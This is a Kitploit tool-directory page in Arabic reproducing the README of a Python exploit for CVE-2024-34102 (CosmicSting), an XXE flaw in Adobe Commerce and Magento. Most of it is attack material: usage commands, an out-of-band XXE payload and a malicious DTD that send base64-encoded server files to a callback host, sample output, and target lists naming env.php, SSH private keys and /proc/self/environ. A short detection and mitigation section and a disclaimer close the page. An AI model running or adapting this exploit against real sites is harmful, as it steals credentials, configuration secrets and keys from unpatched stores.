Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-34102 — استغلال CVE-2024-34102 لـ python3 | Kitploit
أدوات/GitHubGitHub/nmmorette/cve-2024-34102
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnmmorette/cve-2024-34102

CVE-2024-34102

استغلال CVE-2024-34102 لـ python3

عرض المستودع
11منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-34102 - استغلال XXE CosmicSting

Python Version CVE

استغلال لـ CVE-2024-34102 (CosmicSting) - ثغرة الكيان الخارجي XML (XXE) في Adobe Commerce وMagento.

📋 حول الثغرة

CVE-2024-34102 هي ثغرة XXE (كيان خارجي XML) خطيرة تؤثر على:

  • إصدارات Adobe Commerce 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 وما قبلها
  • Magento Open Source (نفس الإصدارات)

تسمح هذه الثغرة لمهاجم غير مصادق بـ:

  • 📄 قراءة ملفات عشوائية من الخادم
  • 🔐 تسريب بيانات الاعتماد والتكوينات الحساسة
  • 💾 الوصول إلى معلومات قاعدة البيانات
  • 🚨 تنفيذ كود عشوائي (في بعض السيناريوهات)

درجة CVSS: 9.8 (حرجة)

🎯 الإسناد

يعتمد هذا الاستغلال على العمل الأصلي لـ:

  • @Chocapikk - الاستغلال الأصلي لـ CVE-2024-34102

التحسينات في هذه النسخة:

  • ✅ خادم DTD ديناميكي مخصص (يتجنب الاعتماد على fars.ee)
  • ✅ خادم استرجاع مع فك تلقائي
  • ✅ التحقق من المعلمات المطلوبة
  • ✅ منطق إعادة المحاولة للخدمات الخارجية
  • ✅ رسائل خطأ أكثر وصفًا
  • ✅ دعم HTTPS للاسترجاع
  • ✅ توافق كامل مع Python 3.8+

🛠️ المتطلبات

  • Python 3.8 أو أعلى
  • الوصول إلى خادم لاستضافة ملفات DTD (VPS، Burp Collaborator، إلخ)
  • خدمة استرجاع (Burp Collaborator، Oastify، أو خادم خاص)

📦 التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
cd CVE-2024-34102

# Install dependencies
pip install -r requirements.txt

🚀 الاستخدام

الطريقة 1: استخدام fars.ee (تلقائي)

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c your-callback.oastify.com

الطريقة 2: استخدام خادم DTD خاص بك

الطرفية 1 - خادم DTD:

root@kitploit:~
sudo python3 server_dtd.py

الطرفية 2 - الاستغلال:

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c your-callback.oastify.com \
  --dtd-server YOUR-IP:8000

الطريقة 3: مع خادم استرجاع خاص بك

الطرفية 1 - خادم DTD:

root@kitploit:~
sudo python3 server_dtd.py

الطرفية 2 - خادم الاسترجاع (فك تلقائي):

root@kitploit:~
sudo python3 callback_server.py

الطرفية 3 - الاستغلال:

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c YOUR-CALLBACK-IP \
  --dtd-server YOUR-DTD-IP:8000

📝 المعاملات

مطلوب:

  • -u, --url - URL الهدف (النطاق الأساسي)
  • -f, --file - الملف المراد قراءته من الخادم (مثل /etc/passwd)
  • -c, --callback - خادم الاسترجاع (IP/نطاق)

اختياري:

  • --dtd-server - خادم مخصص لاستضافة ملف DTD
  • --https - استخدام HTTPS للاسترجاع (الافتراضي: HTTP)

🎬 أمثلة

قراءة /etc/passwd

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /etc/passwd \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

قراءة تكوين Magento

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /var/www/html/app/etc/env.php \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

قراءة مفاتيح SSH

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /home/ubuntu/.ssh/id_rsa \
  -c abc123.burpcollaborator.net \
  --dtd-server 192.168.1.100:8000 \
  --https

🔍 كيف يعمل

1. XXE خارج النطاق

يستخدم الاستغلال تقنية XXE خارج النطاق لتسريب البيانات:

root@kitploit:~
<!-- Payload sent to target -->
<!DOCTYPE r [
  <!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
  %sp;
  %param1;
]>
<r>&exfil;</r>

2. DTD خارجي

يقوم الخادم الهدف بتحميل DTD الخبيث:

root@kitploit:~
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">

3. التسريب

يعالج الخادم XML، ويقرأ الملف، ويشفره بـ base64 ويرسله إلى الاسترجاع:

root@kitploit:~
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...

4. فك التشفير

root@kitploit:~
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d

📊 مثال على الإخراج

root@kitploit:~
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Target: https://vulnerable-site.com
[+] Callback Server: abc123.oastify.com
[+] Using custom DTD server: 192.168.1.100:8000
[+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http

DTD will be dynamically generated with:
[*]   Callback: http://abc123.oastify.com
[*]   File: /etc/passwd

DTD server is running? Ready to continue? [y/N]: y
[+] Target file: /etc/passwd
[+] Callback URL: http://abc123.oastify.com/?exploited=...
[*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Response status: 500
[!] Status 500 - This is normal! XXE may have triggered.
[!] Check your callback server for incoming requests.
[*] Waiting for callback (5 seconds)...

=== CHECK YOUR CALLBACK SERVER ===
[!] Monitor your callback service for incoming HTTP requests
[!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>

To decode the exfiltrated data:
[*]   echo 'BASE64_STRING' | base64 -d

[!] Check your Burp Collaborator or Oastify dashboard now!

🛡️ الكشف والتخفيف

للمدافعين:

الكشف:

  • راقب طلبات HTTP إلى نقاط النهاية /rest/V1/guest-carts/*/estimate-shipping-methods
  • تنبيه على حمولات XML التي تحتوي على كيانات خارجية (<!ENTITY>)
  • كشف الاتصالات الصادرة إلى نطاقات مشبوهة

التخفيف:

  • التحديث إلى الإصدارات المصححة:
    • Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9
  • تعطيل معالجة الكيانات الخارجية في محلل XML
  • تنفيذ جدار حماية للتطبيقات (WAF) بقواعد مكافحة XXE

لمختبري الاختراق:

ملفات مثيرة للاهتمام للاختبار:

root@kitploit:~
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ

⚖️ إخلاء مسؤولية قانوني

root@kitploit:~
This exploit is provided for educational and security research purposes only.

Using this code to test systems without explicit authorization is ILLEGAL.

You are SOLELY responsible for your actions. Use only on:
✅ Your own test environments
✅ Authorized bug bounty programs
✅ Contracted penetration tests

DO NOT use on:
❌ Systems without authorization
❌ Production environments without permission
❌ Any malicious activity

The author is not responsible for misuse of this code.

📚 المراجع

  • نشرة أمنية من Adobe APSB24-40
  • تفاصيل CVE-2024-34102
  • الوقاية من XXE حسب OWASP
  • الاستغلال الأصلي بواسطة Chocapikk

⭐ إذا كان هذا المشروع مفيدًا، فيرجى التفكير في منحه نجمة!

تنزيل الأداة